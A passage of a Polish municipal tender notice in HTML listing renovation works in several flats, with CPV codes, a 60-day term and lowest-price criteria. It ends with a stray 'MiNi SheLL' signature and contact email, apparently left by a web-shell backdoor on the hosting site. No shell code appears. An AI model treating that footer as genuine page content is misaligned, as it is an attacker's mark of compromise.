b)	w branży sanitarnej - wymiana zlewozmywaka, baterii umywalkowej, kuchni gazowej, 
c)	w branży elektrycznej - wymiana tablicy licznikowej, wymiana osprzętu, pomiar rezystancji instalacji elektr.,

2.	nr 2 w budynku przy ul. Liściastej 11 (powierzchnia użytkowa lokalu - 46,17 m2):
a)	w branży budowlanej - przecieranie tynków, wymiana stolarki drzwiowej, malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - próba instalacji gazowej, sprawdzenie kuchni gazowej czteropalnikowej, montaż wodomierza, 
c)	w branży elektrycznej - demontaż osprzętu, montaż przewodów, montaż osprzętu, wymiana tablicy licznikowej, pomiar rezystancji instalacji elektr.,

3.	nr 15 w budynku przy ul. Parkowej 26 (powierzchnia użytkowa lokalu - 42,11m2):
a)	w branży budowlanej - przecieranie tynków, przestawienie pieców- 2 szt., montaż czujników tlenku węgla malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - montaż zlewozmywaka, próba instalacji gazowej, montaż wodomierza, wymiana kuchni gazowej,
c)	w branży elektrycznej - wymiana osprzętu i przewodów, pomiar rezystancji instalacji elektr.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ul. Słowackiego 11/27, ul. Słowackiego 15/19, al. Powstańców Wielkopolskich 38/6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	nr 27 w budynku przy ul. Słowackiego 11 (powierzchnia użytkowa lokalu - 39,66m2):
a)	w branży budowlanej -  dopasowanie skrzydeł drzwiowych, montaż detektora tlenku węgla, malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - montaż zlewozmywaka i syfonu, montaż kuchni gazowej, wodomierza, próba instalacji gazowej, 
c)	w branży elektrycznej - wymiana tablicy licznikowej, wymiana osprzętu i przewodów, pomiar rezystancji instalacji elektr.

2.	nr 19 w budynku przy ul. Słowackiego 15 (powierzchnia użytkowa lokalu - 31,46m2):
a)	w branży budowlanej - wymiana stolarki okiennej, wymiana posadzki PCV, montaż detektora tlenku węgla, naprawa pieców kaflowych - 2 szt., malowanie wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - montaż zlewozmywaka, syfonu, wymiana kuchni gazowej, montaż wodomierza, próba gazowa,,
c)	w branży elektrycznej - wymiana przewodów i osprzętu, pomiar rezystancji instalacji elektr.

3.	nr 6 w budynku przy ul. Powstańców Wielkopolskich 38 (powierzchnia użytkowa lokalu - 39,23m2):
a)	w branży budowlanej - dopasowanie skrzydeł drzwiowych i okiennych, malowanie wraz z robotami towarzyszącymi, wymiana wykładziny z tworzyw sztucznych, naprawa pieca, wywóz gruzu,
b)	w branży sanitarnej - montaż detektora tlenku węgla, próba instalacji gazowej, wymiana zlewozmywaka i baterii,
c)	w branży elektrycznej - wymiana osprzętu i przewodów, pomiar rezystancji instalacji elektr.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com